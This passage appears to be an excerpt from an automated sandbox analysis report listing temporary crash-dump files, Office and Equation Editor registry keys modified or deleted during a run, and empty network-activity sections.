- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER731C.tmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER731C.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERA75C.tmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERA75C.tmp.mdmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp.appcompat.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERD918.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERD918.tmp.WERInternalMetadata.xml",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WER16CE.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WER16CE.tmp.xml",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WER17B9.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WER17B9.tmp.hdmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WER44B6.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WER44B6.tmp.mdmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\CVR9656.tmp.cvr",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERDD6C.tmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERDD6C.tmp.ref",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\Report.wer.tmp"
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\/ys",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\Trusted Documents\\LastPurgeTime",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ReviewCycle",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ReviewCycle\\ReviewToken",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\CacheReady",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastRequest",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastUpdate",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\NextUpdate",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\CA5C34",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\CA5C34\\CA5C34",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005119110000000000000000F01FEC\\Usage\\OUTLOOKFiles",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingConfigurableSettings",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingLastSyncTime",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingLastWriteTime",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\General\\LastAutoSavePurgeTime",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\MTTF",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\MTTA",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109E60090400000000000F01FEC\\Usage\\EquationEditorFilesIntl_1033",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\Zoom",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\CustomZoom",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ShowAll",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\Version",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ForceOpen",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ToolbarDocked",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ToolbarShown",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ToolbarDockPos",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\MTUpgradeDialog",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\Full",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\Script",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\ScriptScript",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\Symbol",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\SubSymbol",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\LineSpacing",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\MatrixRowSpacing",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\MatrixColSpacing",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\SuperscriptHeight",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\SubscriptDepth",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\LimHeight",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\LimDepth",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\LimLineSpacing",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\NumerHeight",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\DenomDepth",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\FractBarOver",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\FractBarThick",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\SubFractBarThick",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\FenceOver",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\SpacingFactor",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\MinGap",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\RadicalGap",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\EmbellGap",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\PrimeHeight",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Text",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Function",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Variable",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\LCGreek",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\UCGreek",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Symbol",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Vector",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Number",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\User1",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\User2",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows\\EquationWindow",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows\\SpacingWindow",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows\\TextLanguage",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows\\MathLanguage",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\ExceptionRecord",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.doc\\OpenWithList\\MRUList",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R\\Zvpebfbsg Bssvpr\\Bssvpr15\\JVAJBEQ.RKR",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\HRZR_PGYFRFFVBA",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7\\pzq.rkr",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\OfficeSoftwareProtectionPlatform\\ServiceSessionId",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\NHRTimes"
- * Deleted Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\/ys",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\f=q",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\MTTT",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\PCIIDE\\IDECHANNEL\\4&2617AEAE&0&1\\CustomPropertyHwIdKey",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\PCIIDE\\IDECHANNEL\\4&2617AEAE&0&0\\CustomPropertyHwIdKey"
- * DNS Communications:
- * Domains:
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC: